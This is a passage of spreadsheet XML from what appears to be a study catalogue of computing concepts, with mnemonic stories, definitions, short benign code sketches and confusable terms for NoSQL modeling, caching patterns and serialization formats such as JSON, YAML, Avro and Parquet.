        </is>
      </c>
      <c r="F747" t="inlineStr">
        <is>
          <t>cart on two replicas briefly differs / partition heals -&gt; versions reconcile / user never saw an error page</t>
        </is>
      </c>
      <c r="G747" t="inlineStr">
        <is>
          <t>ACID — ACID promises every transaction sees consistent data now; BASE promises the system converges later.</t>
        </is>
      </c>
      <c r="H747" t="inlineStr">
        <is>
          <t>Gossiping villagers eventually all know (gossip is a protocol, saved for the distributed domain).</t>
        </is>
      </c>
      <c r="J747" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K747" t="inlineStr">
        <is>
          <t>NoSQL families</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" t="n">
        <v>0</v>
      </c>
      <c r="B748" t="inlineStr">
        <is>
          <t>746</t>
        </is>
      </c>
      <c r="C748" t="inlineStr">
        <is>
          <t>Schema-on-read</t>
        </is>
      </c>
      <c r="D748" t="inlineStr">
        <is>
          <t>A junk drawer you fill freely for years; sorting happens only at the moment a hand goes in. Each family member imposes a different order — batteries by size, or by 'probably dead'.</t>
        </is>
      </c>
      <c r="E748" t="inlineStr">
        <is>
          <t>Data is written without enforced structure; each reader applies a schema at query time, so interpretation is deferred and may vary.</t>
        </is>
      </c>
      <c r="F748" t="inlineStr">
        <is>
          <t>raw JSON logs land in S3, no table upfront / df = spark.read.schema(s).json('s3://logs/') / two teams read the same files differently</t>
        </is>
      </c>
      <c r="G748" t="inlineStr">
        <is>
          <t>Schemaless — data always has implicit structure; schema-on-read merely moves enforcement from write time to read time.</t>
        </is>
      </c>
      <c r="H748" t="inlineStr">
        <is>
          <t>Rorschach inkblot data (implies there is no true structure at all).</t>
        </is>
      </c>
      <c r="J748" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K748" t="inlineStr">
        <is>
          <t>NoSQL families</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" t="n">
        <v>0</v>
      </c>
      <c r="B749" t="inlineStr">
        <is>
          <t>747</t>
        </is>
      </c>
      <c r="C749" t="inlineStr">
        <is>
          <t>Design by access pattern</t>
        </is>
      </c>
      <c r="D749" t="inlineStr">
        <is>
          <t>The chef stocks each station for tonight's menu, not alphabetically: the garnish sits beside the plate it lands on. Orders (queries) fly out because the layout mirrors them; an off-menu request means re-prepping the kitchen.</t>
        </is>
      </c>
      <c r="E749" t="inlineStr">
        <is>
          <t>In NoSQL, model tables and keys from the exact queries you must serve — not from entity shape — because ad-hoc joins don't exist.</t>
        </is>
      </c>
      <c r="F749" t="inlineStr">
        <is>
          <t>DynamoDB: list the queries first: / 'orders by user by date' -&gt; PK=user_id, SK=order_date / a new query pattern may need a new GSI/table</t>
        </is>
      </c>
      <c r="G749" t="inlineStr">
        <is>
          <t>Entity-relationship modeling — relational designs entities first and trusts joins for any query; NoSQL bakes the query into the layout.</t>
        </is>
      </c>
      <c r="H749" t="inlineStr">
        <is>
          <t>Tailored suit vs off-the-rack (fit metaphor carries no query imagery).</t>
        </is>
      </c>
      <c r="J749" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K749" t="inlineStr">
        <is>
          <t>NoSQL families</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" t="n">
        <v>0</v>
      </c>
      <c r="B750" t="inlineStr">
        <is>
          <t>748</t>
        </is>
      </c>
      <c r="C750" t="inlineStr">
        <is>
          <t>Embedding vs referencing</t>
        </is>
      </c>
      <c r="D750" t="inlineStr">
        <is>
          <t>Scrapbooking: glue the photo onto the page (embed — instant to view, but a shared photo is re-printed onto every page) or write 'see album B, photo 12' (reference — one original, an extra walk to the shelf).</t>
        </is>
      </c>
      <c r="E750" t="inlineStr">
        <is>
          <t>Document modeling choice: nest related data inside the parent (one fast read, duplication) or store an ID to fetch separately (one copy, extra trip).</t>
        </is>
      </c>
      <c r="F750" t="inlineStr">
        <is>
          <t>Embed: {order:1, items:[{sku,qty}...]} one read / Reference: {order:1, item_ids:[9,12]} / + second query; items deduped across orders</t>
        </is>
      </c>
      <c r="G750" t="inlineStr">
        <is>
          <t>SQL foreign key — a document reference is app-resolved with no enforced integrity; an FK is engine-enforced and joinable.</t>
        </is>
      </c>
      <c r="H750" t="inlineStr">
        <is>
          <t>Backpack vs locker for books (lockers already anchor key-value stores).</t>
        </is>
      </c>
      <c r="J750" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K750" t="inlineStr">
        <is>
          <t>NoSQL families</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" t="n">
        <v>0</v>
      </c>
      <c r="B751" t="inlineStr">
        <is>
          <t>749</t>
        </is>
      </c>
      <c r="C751" t="inlineStr">
        <is>
          <t>Polyglot persistence</t>
        </is>
      </c>
      <c r="D751" t="inlineStr">
        <is>
          <t>One hospital, many archives: X-ray films in the imaging vault, blood samples in the cold fridge, appointments in the front ledger. One patient, three purpose-built stores — and three systems for the night shift to keep alive.</t>
        </is>
      </c>
      <c r="E751" t="inlineStr">
        <is>
          <t>Using several database types in one system, each chosen for the workload it serves best, at the cost of operating them all.</t>
        </is>
      </c>
      <c r="F751" t="inlineStr">
        <is>
          <t>Postgres: orders and money / Redis: sessions; Elasticsearch: product search / S3: images -- one app, four stores</t>
        </is>
      </c>
      <c r="G751" t="inlineStr">
        <is>
          <t>Multi-model database — one engine exposing several models; polyglot runs separate specialized engines side by side.</t>
        </is>
      </c>
      <c r="H751" t="inlineStr">
        <is>
          <t>Swiss Army knife (backwards — polyglot is many tools, not one gadget).</t>
        </is>
      </c>
      <c r="J751" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K751" t="inlineStr">
        <is>
          <t>NoSQL families</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" t="n">
        <v>0</v>
      </c>
      <c r="B752" t="inlineStr">
        <is>
          <t>750</t>
        </is>
      </c>
      <c r="C752" t="inlineStr">
        <is>
          <t>Cache</t>
        </is>
      </c>
      <c r="D752" t="inlineStr">
        <is>
          <t>The fridge is downstairs, so your desk's top drawer holds the snacks you actually keep reaching for. The drawer is tiny — every new snack squeezed in shoves a neglected one out.</t>
        </is>
      </c>
      <c r="E752" t="inlineStr">
        <is>
          <t>A small fast store holding copies of hot data so repeat reads skip the slow source; effectiveness lives and dies by hit ratio.</t>
        </is>
      </c>
      <c r="F752" t="inlineStr">
        <is>
          <t>v = redis.get(k) # ~0.1 ms / if v is None: v = db.query(k) # ~5 ms / 99% hit ratio -&gt; DB sees 1% of reads</t>
        </is>
      </c>
      <c r="G752" t="inlineStr">
        <is>
          <t>Memoization / CPU cache — same principle at other layers; this tier caches data between app and database (e.g. Redis).</t>
        </is>
      </c>
      <c r="H752" t="inlineStr">
        <is>
          <t>Squirrel's nut stash (hoarding misses the 'copy of a slower source' point).</t>
        </is>
      </c>
      <c r="J752" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K752" t="inlineStr">
        <is>
          <t>Caching</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" t="n">
        <v>0</v>
      </c>
      <c r="B753" t="inlineStr">
        <is>
          <t>751</t>
        </is>
      </c>
      <c r="C753" t="inlineStr">
        <is>
          <t>Cache-aside</t>
        </is>
      </c>
      <c r="D753" t="inlineStr">
        <is>
          <t>You open the snack drawer yourself; it's empty, so YOU trudge to the fridge and, walking back, drop a copy in the drawer for next time. The drawer never restocks itself — it's a dumb box.</t>
        </is>
      </c>
      <c r="E753" t="inlineStr">
        <is>
          <t>The app checks the cache first, on miss reads the database itself, then writes the result back into the cache; the cache stays passive.</t>
        </is>
      </c>
      <c r="F753" t="inlineStr">
        <is>
          <t>v = cache.get(k) / if v is None: / v = db.get(k); cache.set(k, v, ttl=300)</t>
        </is>
      </c>
      <c r="G753" t="inlineStr">
        <is>
          <t>Read-through — there the cache itself fetches from the source on a miss; in cache-aside the application does the fetching.</t>
        </is>
      </c>
      <c r="H753" t="inlineStr">
        <is>
          <t>Sticky note left for future you (notes don't expire or evict).</t>
        </is>
      </c>
      <c r="J753" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K753" t="inlineStr">
        <is>
          <t>Caching</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" t="n">
        <v>0</v>
      </c>
      <c r="B754" t="inlineStr">
        <is>
          <t>752</t>
        </is>
      </c>
      <c r="C754" t="inlineStr">
        <is>
          <t>Read-through cache</t>
        </is>
      </c>
      <c r="D754" t="inlineStr">
        <is>
          <t>A vending machine with a tiny stocker living inside: you only ever press the button. If the slot is empty, his arm reaches back into the warehouse, loads the slot, and the can drops — you never see the warehouse.</t>
        </is>
      </c>
      <c r="E754" t="inlineStr">
        <is>
          <t>The app only ever asks the cache; on a miss the cache itself loads the value from the backing store, returns it, and keeps it.</t>
        </is>
      </c>
      <c r="F754" t="inlineStr">
        <is>
          <t>cache = Caffeine.newBuilder() / .build(key -&gt; db.load(key)); / v = cache.get(k) // miss handled inside</t>
        </is>
      </c>
      <c r="G754" t="inlineStr">
        <is>
          <t>Cache-aside — the app does the DB round trip there; read-through hides the source behind the cache API.</t>
        </is>
      </c>
      <c r="H754" t="inlineStr">
        <is>
          <t>Butler fetching from the cellar (butlers also take writes — muddles the pattern).</t>
        </is>
      </c>
      <c r="J754" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K754" t="inlineStr">
        <is>
          <t>Caching</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" t="n">
        <v>0</v>
      </c>
      <c r="B755" t="inlineStr">
        <is>
          <t>753</t>
        </is>
      </c>
      <c r="C755" t="inlineStr">
        <is>
          <t>Write-through cache</t>
        </is>
      </c>
      <c r="D755" t="inlineStr">
        <is>
          <t>A carbon-copy pad: one pen stroke writes the top sheet (cache) and presses through to the ledger page beneath (database) in the same motion. The stroke drags a little — but the sheets can never disagree.</t>
        </is>
      </c>
      <c r="E755" t="inlineStr">
        <is>
          <t>Writes go to the cache and synchronously to the backing store before acknowledging; never stale, but writes pay full latency.</t>
        </is>
      </c>
      <c r="F755" t="inlineStr">
        <is>
          <t>def put(k, v): / db.write(k, v) # sync / cache.set(k, v) # ack only after both</t>
        </is>
      </c>
      <c r="G755" t="inlineStr">
        <is>
          <t>Write-behind — behind acknowledges first and flushes later (fast, can lose data); through is synchronous and safe.</t>
        </is>
      </c>
      <c r="H755" t="inlineStr">
        <is>
          <t>Twin scribes writing simultaneously (two agents suggest race conditions).</t>
        </is>
      </c>
      <c r="J755" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K755" t="inlineStr">
        <is>
          <t>Caching</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" t="n">
        <v>0</v>
      </c>
      <c r="B756" t="inlineStr">
        <is>
          <t>754</t>
        </is>
      </c>
      <c r="C756" t="inlineStr">
        <is>
          <t>Write-behind cache</t>
        </is>
      </c>
      <c r="D756" t="inlineStr">
        <is>
          <t>The bartender chalks your rounds on a slate instantly and settles with the register in one batch at closing. Lightning service — but if a spilled beer wipes the slate before settling, those rounds never happened.</t>
        </is>
      </c>
      <c r="E756" t="inlineStr">
        <is>
          <t>Writes hit the cache and are acknowledged immediately, then flushed to the backing store asynchronously — fast, but a crash loses unflushed writes.</t>
        </is>
      </c>
      <c r="F756" t="inlineStr">
        <is>
          <t>cache.set(k, v); ack() # instant / queue.push((k, v)) / # flusher writes queue to DB every 5s</t>
        </is>
      </c>
      <c r="G756" t="inlineStr">
        <is>
          <t>Write-through — through waits for the store before acking; behind acks first and gambles on the flush.</t>
        </is>
      </c>
      <c r="H756" t="inlineStr">
        <is>
          <t>Postbox emptied nightly (mail loss feels rare; a wiped slate is visceral).</t>
        </is>
      </c>
      <c r="J756" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K756" t="inlineStr">
        <is>
          <t>Caching</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" t="n">
        <v>0</v>
      </c>
      <c r="B757" t="inlineStr">
        <is>
          <t>755</t>
        </is>
      </c>
      <c r="C757" t="inlineStr">
        <is>
          <t>TTL expiration</t>
        </is>
      </c>
      <c r="D757" t="inlineStr">
        <is>
          <t>Every cache entry parks at its own meter. When the meter hits zero the tow truck hauls the data away, however shiny the car — freshness by countdown, no judgment involved.</t>
        </is>
      </c>
      <c r="E757" t="inlineStr">
        <is>
          <t>Each entry carries a time-to-live; past it the entry counts as gone, bounding staleness without any invalidation logic.</t>
        </is>
      </c>
      <c r="F757" t="inlineStr">
        <is>
          <t>SET price:sku42 '9.99' EX 60 / -- worst case: 60s stale / no purge code needed when the price changes</t>
        </is>
      </c>
      <c r="G757" t="inlineStr">
        <is>
          <t>LRU eviction — eviction reacts to capacity pressure; TTL removes by age even in a half-empty cache.</t>
        </is>
      </c>
      <c r="H757" t="inlineStr">
        <is>
          <t>Milk expiry stamp (use-by dates say 'maybe fine'; parking meters are absolute).</t>
        </is>
      </c>
      <c r="J757" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K757" t="inlineStr">
        <is>
          <t>Caching</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" t="n">
        <v>0</v>
      </c>
      <c r="B758" t="inlineStr">
        <is>
          <t>756</t>
        </is>
      </c>
      <c r="C758" t="inlineStr">
        <is>
          <t>Cache invalidation hardness</t>
        </is>
      </c>
      <c r="D758" t="inlineStr">
        <is>
          <t>You change your phone number, then must hunt down every place the old one lives: friends' phones, forms, the fridge magnet, grandma's book. Miss one and someone confidently dials the wrong number for years — a stale cache.</t>
        </is>
      </c>
      <c r="E758" t="inlineStr">
        <is>
          <t>Purging or updating every cached copy exactly when the source changes is notoriously error-prone — one of the two hard things in CS.</t>
        </is>
      </c>
      <c r="F758" t="inlineStr">
        <is>
          <t>UPDATE products SET name='X2' WHERE id=42; / copies: Redis, CDN, materialized view, browser / purge all, in order, race-free -- or serve lies</t>
        </is>
      </c>
      <c r="G758" t="inlineStr">
        <is>
          <t>TTL expiry — TTL is the blunt workaround that accepts bounded staleness; invalidation is the precise, hard, event-driven purge.</t>
        </is>
      </c>
      <c r="H758" t="inlineStr">
        <is>
          <t>Recalling gossip from a village (gossip imagery belongs to distributed protocols).</t>
        </is>
      </c>
      <c r="J758" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K758" t="inlineStr">
        <is>
          <t>Caching</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" t="n">
        <v>0</v>
      </c>
      <c r="B759" t="inlineStr">
        <is>
          <t>757</t>
        </is>
      </c>
      <c r="C759" t="inlineStr">
        <is>
          <t>LRU and LFU eviction</t>
        </is>
      </c>
      <c r="D759" t="inlineStr">
        <is>
          <t>A stuffed closet: LRU tosses whatever you wore longest ago; LFU counts wears and tosses the least-worn. The tux worn once last night survives LRU's purge but is first out under LFU.</t>
        </is>
      </c>
      <c r="E759" t="inlineStr">
        <is>
          <t>When full, the cache evicts by recency (LRU: least recently used) or by frequency (LFU: least frequently used) to make room.</t>
        </is>
      </c>
      <c r="F759" t="inlineStr">
        <is>
          <t>@functools.lru_cache(maxsize=1000) / Redis: maxmemory-policy allkeys-lru / (or allkeys-lfu for frequency)</t>
        </is>
      </c>
      <c r="G759" t="inlineStr">
        <is>
          <t>TTL — TTL removes entries because they are old; eviction removes them because the cache is full.</t>
        </is>
      </c>
      <c r="H759" t="inlineStr">
        <is>
          <t>Musical chairs for data (that's random eviction — wrong policy).</t>
        </is>
      </c>
      <c r="J759" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K759" t="inlineStr">
        <is>
          <t>Caching</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" t="n">
        <v>0</v>
      </c>
      <c r="B760" t="inlineStr">
        <is>
          <t>758</t>
        </is>
      </c>
      <c r="C760" t="inlineStr">
        <is>
          <t>Cache stampede protection</t>
        </is>
      </c>
      <c r="D760" t="inlineStr">
        <is>
          <t>The bakery's 'fresh until 9:00' sign flips and the whole queue charges the tiny kitchen at once. Smart baker: one runner fetches the new tray (lock) while everyone else gets yesterday's croissant (stale), and tomorrow's sign flips at 9:07 (jitter).</t>
        </is>
      </c>
      <c r="E760" t="inlineStr">
        <is>
          <t>When a hot key expires, many concurrent misses hammer the source at once; fix with per-key locks, TTL jitter, or serving stale while one refreshes.</t>
        </is>
      </c>
      <c r="F760" t="inlineStr">
        <is>
          <t>if cache.miss(k): / if lock.acquire(k): v = db.get(k); cache.set(k,v) / else: v = cache.get_stale(k) # or brief wait</t>
        </is>
      </c>
      <c r="G760" t="inlineStr">
        <is>
          <t>Ordinary cache miss — a stampede is thousands of simultaneous misses on one hot key, not a single cold read.</t>
        </is>
      </c>
      <c r="H760" t="inlineStr">
        <is>
          <t>Black Friday doors opening (crowd yes, but no expiry trigger in the image).</t>
        </is>
      </c>
      <c r="J760" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K760" t="inlineStr">
        <is>
          <t>Caching</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" t="n">
        <v>0</v>
      </c>
      <c r="B761" t="inlineStr">
        <is>
          <t>759</t>
        </is>
      </c>
      <c r="C761" t="inlineStr">
        <is>
          <t>Negative caching</t>
        </is>
      </c>
      <c r="D761" t="inlineStr">
        <is>
          <t>The doorman keeps a pencil list of names NOT on the guest list. The same gatecrasher returns five times: five glances at the not-list, zero trips to the ledger inside. He erases it often — people do get invited eventually.</t>
        </is>
      </c>
      <c r="E761" t="inlineStr">
        <is>
          <t>Cache the fact that a lookup found nothing, so repeated misses for the same absent key stop hitting the store; keep its TTL short.</t>
        </is>
      </c>
      <c r="F761" t="inlineStr">
        <is>
          <t>u = cache.get('user:999') / if u == 'NOT_FOUND': return 404 # no DB hit / cache.set('user:999','NOT_FOUND', ttl=30)</t>
        </is>
      </c>
      <c r="G761" t="inlineStr">
        <is>
          <t>Regular caching — this stores absence, not values; too long a TTL makes newly created items look missing.</t>
        </is>
      </c>
      <c r="H761" t="inlineStr">
        <is>
          <t>Bouncer's banned-photo wall (bans are permanent; negative entries must expire).</t>
        </is>
      </c>
      <c r="J761" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K761" t="inlineStr">
        <is>
          <t>Caching</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" t="n">
        <v>0</v>
      </c>
      <c r="B762" t="inlineStr">
        <is>
          <t>760</t>
        </is>
      </c>
      <c r="C762" t="inlineStr">
        <is>
          <t>Serialization</t>
        </is>
      </c>
      <c r="D762" t="inlineStr">
        <is>
          <t>IKEA logic: the assembled chair (object graph, pointers as glued joints) can't ship. Flatten it into a labeled box of parts (bytes) with instructions; the buyer rebuilds an identical chair in a different living room (process).</t>
        </is>
      </c>
      <c r="E762" t="inlineStr">
        <is>
          <t>Converting in-memory structures into a byte or text sequence for storage or transfer, and deserializing them back on the other side.</t>
        </is>
      </c>
      <c r="F762" t="inlineStr">
        <is>
          <t>data = json.dumps({'id': 7, 'tags': ['a']}) / send over network / write to disk / obj = json.loads(data) # other process or language</t>
        </is>
      </c>
      <c r="G762" t="inlineStr">
        <is>
          <t>Serializable isolation level — unrelated despite the name: that is transaction ordering, not encoding objects to bytes.</t>
        </is>
      </c>
      <c r="H762" t="inlineStr">
        <is>
          <t>Freeze-drying astronaut food (rehydration loses the pointer-flattening nuance).</t>
        </is>
      </c>
      <c r="J762" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K762" t="inlineStr">
        <is>
          <t>Serialization &amp; data formats</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" t="n">
        <v>0</v>
      </c>
      <c r="B763" t="inlineStr">
        <is>
          <t>761</t>
        </is>
      </c>
      <c r="C763" t="inlineStr">
        <is>
          <t>JSON</t>
        </is>
      </c>
      <c r="D763" t="inlineStr">
        <is>
          <t>Jason, the friendly courier every country understands: travels light, speaks plainly, checks no ID (schema). But he can't pronounce dates — he hands them over scribbled as strings — and drops any coin bigger than 2^53.</t>
        </is>
      </c>
      <c r="E763" t="inlineStr">
        <is>
          <t>Ubiquitous text format of objects, arrays, strings, numbers, booleans, null — human-readable and schema-free; no comments, dates, or safe ints past 2^53.</t>
        </is>
      </c>
      <c r="F763" t="inlineStr">
        <is>
          <t>{"id": 7, "tags": ["a", "b"], / "ts": "2026-07-10T12:00:00Z"} / -- the date is just a string by convention</t>
        </is>
      </c>
      <c r="G763" t="inlineStr">
        <is>
          <t>JavaScript object literal — JSON is stricter: double-quoted keys, no comments, no trailing commas, no functions.</t>
        </is>
      </c>
      <c r="H763" t="inlineStr">
        <is>
          <t>Argonauts' cargo manifest (myth pun too oblique for fast recall).</t>
        </is>
      </c>
      <c r="J763" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K763" t="inlineStr">
        <is>
          <t>Serialization &amp; data formats</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" t="n">
        <v>0</v>
      </c>
      <c r="B764" t="inlineStr">
        <is>
          <t>762</t>
        </is>
      </c>
      <c r="C764" t="inlineStr">
        <is>
          <t>YAML</t>
        </is>
      </c>
      <c r="D764" t="inlineStr">
        <is>
          <t>A poem whose meaning hangs on indentation — nudge one space and a stanza changes parents. In the last line the country code NO freezes into boolean false: Norway, voted out of existence by YAML 1.1.</t>
        </is>
      </c>
      <c r="E764" t="inlineStr">
        <is>
          <t>Indentation-structured, human-first format beloved for config; comments and anchors, but whitespace is syntax and unquoted scalars get coerced.</t>
        </is>
      </c>
      <c r="F764" t="inlineStr">
        <is>
          <t>server: / port: 8080 / country: NO # YAML 1.1 reads false; quote 'NO'</t>
        </is>
      </c>
      <c r="G764" t="inlineStr">
        <is>
          <t>JSON — YAML adds comments, anchors, multi-line strings; but JSON never turns NO into false or breaks on a stray space.</t>
        </is>
      </c>
      <c r="H764" t="inlineStr">
        <is>
          <t>Jenga tower of spaces (instability yes, coercion traps lost).</t>
        </is>
      </c>
      <c r="J764" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K764" t="inlineStr">
        <is>
          <t>Serialization &amp; data formats</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" t="n">
        <v>0</v>
      </c>
      <c r="B765" t="inlineStr">
        <is>
          <t>763</t>
        </is>
      </c>
      <c r="C765" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="D765" t="inlineStr">
        <is>
          <t>Data in full Victorian dress: every value is announced on arrival AND departure — &lt;name&gt;Ada&lt;/name&gt; — chaperoned by namespaces and corseted by a schema. Ceremonious and heavy, but nobody sneaks in unvalidated.</t>
        </is>
      </c>
      <c r="E765" t="inlineStr">
        <is>
          <t>Tag-based markup with attributes, namespaces and XSD validation — verbose, strict about well-formedness, still core to enterprise and documents.</t>
        </is>
      </c>
      <c r="F765" t="inlineStr">
        <is>
          <t>&lt;order id="7"&gt; / &lt;item sku="A1" qty="2"/&gt; / &lt;/order&gt; validated against an XSD</t>
        </is>
      </c>
      <c r="G765" t="inlineStr">
        <is>
          <t>HTML — HTML is forgiving display markup for browsers; XML is strict data markup that dies on one unclosed tag.</t>
        </is>
      </c>
      <c r="H765" t="inlineStr">
        <is>
          <t>Bureaucratic forms in triplicate (forms imagery reserved for constraints).</t>
        </is>
      </c>
      <c r="J765" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K765" t="inlineStr">
        <is>
          <t>Serialization &amp; data formats</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" t="n">
        <v>0</v>
      </c>
      <c r="B766" t="inlineStr">
        <is>
          <t>764</t>
        </is>
      </c>
      <c r="C766" t="inlineStr">
        <is>
          <t>Protocol Buffers</t>
        </is>
      </c>
      <c r="D766" t="inlineStr">
        <is>
          <t>A military telegram in dense number code: 'field 1: 7, field 3: Ada' — no names on the wire, just numbered slots. Both ends drill from the same codebook (.proto); lose the codebook and the bytes are gibberish.</t>
        </is>
      </c>
      <c r="E766" t="inlineStr">
        <is>
          <t>Binary format with a compiled .proto schema; fields travel as numbers, not names — tiny, fast, typed, with codegen per language.</t>
        </is>
      </c>
      <c r="F766" t="inlineStr">
        <is>
          <t>message User { / int64 id = 1; / string name = 2; } // wire: tag numbers + values</t>
        </is>
      </c>
      <c r="G766" t="inlineStr">
        <is>
          <t>Avro — Avro ships or registers the schema with the data; protobuf assumes both sides already compiled the codebook.</t>
        </is>
      </c>
      <c r="H766" t="inlineStr">
        <is>
          <t>Morse code operators (Morse encodes characters, not typed numbered fields).</t>
        </is>
      </c>
      <c r="J766" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K766" t="inlineStr">
        <is>
          <t>Serialization &amp; data formats</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" t="n">
        <v>0</v>
      </c>
      <c r="B767" t="inlineStr">
        <is>
          <t>765</t>
        </is>
      </c>
      <c r="C767" t="inlineStr">
        <is>
          <t>Avro</t>
        </is>
      </c>
      <c r="D767" t="inlineStr">
        <is>
          <t>A shipping container with the packing manifest riveted to its door: any dock, even one that has never seen this shipper, unloads it by reading the attached schema; old docks reconcile new manifests line by line (schema resolution).</t>
        </is>
      </c>
      <c r="E767" t="inlineStr">
        <is>
          <t>Binary row format whose schema travels with the data (file header or registry ID), enabling clean schema resolution between versions.</t>
        </is>
      </c>
      <c r="F767" t="inlineStr">
        <is>
          <t>Kafka + Schema Registry: / record bytes start with schema id 42 / reader fetches schema 42, resolves vs its own</t>
        </is>
      </c>
      <c r="G767" t="inlineStr">
        <is>
          <t>Protobuf — protobuf's schema is compiled into both ends and absent from the wire; Avro's schema accompanies the data.</t>
        </is>
      </c>
      <c r="H767" t="inlineStr">
        <is>
          <t>Passport stapled to luggage (passports identify people — weaker fit).</t>
        </is>
      </c>
      <c r="J767" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K767" t="inlineStr">
        <is>
          <t>Serialization &amp; data formats</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" t="n">
        <v>0</v>
      </c>
      <c r="B768" t="inlineStr">
        <is>
          <t>766</t>
        </is>
      </c>
      <c r="C768" t="inlineStr">
        <is>
          <t>Parquet</t>
        </is>
      </c>
      <c r="D768" t="inlineStr">
        <is>
          <t>A parquet floor laid in long strips — each board strip is one column running the whole room. Refinishing the 'price' strip never touches the other boards, and identical boards in a strip compress into one stamped plank.</t>
        </is>
      </c>
      <c r="E768" t="inlineStr">
        <is>
          <t>Columnar file format: each column's values stored contiguously with compression and statistics, so scans read only the columns they need.</t>
        </is>
      </c>
      <c r="F768" t="inlineStr">
        <is>
          <t>df.write.parquet('s3://sales/') / SELECT AVG(amount) FROM sales / -- reads only 'amount' column chunks + stats</t>
        </is>
      </c>
      <c r="G768" t="inlineStr">
        <is>
          <t>Avro — Avro is row-oriented, ideal for streaming whole records; Parquet is columnar, ideal for scanning few columns of many rows.</t>
        </is>
      </c>
      <c r="H768" t="inlineStr">
        <is>
          <t>Sliced loaf vs whole sandwiches (food again; the floor pun encodes the name).</t>
        </is>
      </c>
      <c r="J768" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K768" t="inlineStr">
        <is>
          <t>Serialization &amp; data formats</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" t="n">
        <v>0</v>
      </c>
      <c r="B769" t="inlineStr">
        <is>
          <t>767</t>
        </is>
      </c>
      <c r="C769" t="inlineStr">
        <is>
          <t>Schema evolution compatibility</t>
        </is>
      </c>
      <c r="D769" t="inlineStr">
        <is>
          <t>Cassette decks across generations: your new deck still plays grandma's old tapes (backward); her old deck plays your new mixtape by skipping tracks it doesn't recognize (forward). House rule: add tracks with defaults, never reuse a track number.</t>
        </is>
      </c>
      <c r="E769" t="inlineStr">
        <is>
          <t>Changing a serialized schema while old and new programs interoperate: backward = new reader reads old data; forward = old reader reads new data.</t>
        </is>
      </c>
      <c r="F769" t="inlineStr">
        <is>
          <t>safe: add optional field with a default / unsafe: rename, retype, or reuse field id 3 / registry enforces BACKWARD / FORWARD / FULL</t>
        </is>
      </c>
      <c r="G769" t="inlineStr">
        <is>
          <t>Database schema migration — that mutates live tables with DDL; evolution keeps readers and writers of encoded records compatible.</t>
        </is>
      </c>
      <c r="H769" t="inlineStr">
        <is>
          <t>Chameleon changing skins (no reader/writer pairing in the image).</t>
        </is>
      </c>
      <c r="J769" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K769" t="inlineStr">
        <is>
          <t>Serialization &amp; data formats</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" t="n">
        <v>0</v>
      </c>
      <c r="B770" t="inlineStr">
        <is>
          <t>768</t>
        </is>
      </c>
      <c r="C770" t="inlineStr">
        <is>
          <t>Endianness</t>
        </is>
      </c>
      <c r="D770" t="inlineStr">
        <is>
          <t>Gulliver's Lilliputians wage war over which end of the egg to crack first. Your 4-byte integer sails between their shores: 0x01020304 lands as 04 03 02 01 on the little-endian beach — same egg, opposite crack.</t>
        </is>
      </c>
      <c r="E770" t="inlineStr">
        <is>
          <t>Byte order for multi-byte numbers: big-endian stores the most significant byte first, little-endian the least; mismatches scramble binary data.</t>
        </is>
      </c>
      <c r="F770" t="inlineStr">
        <is>
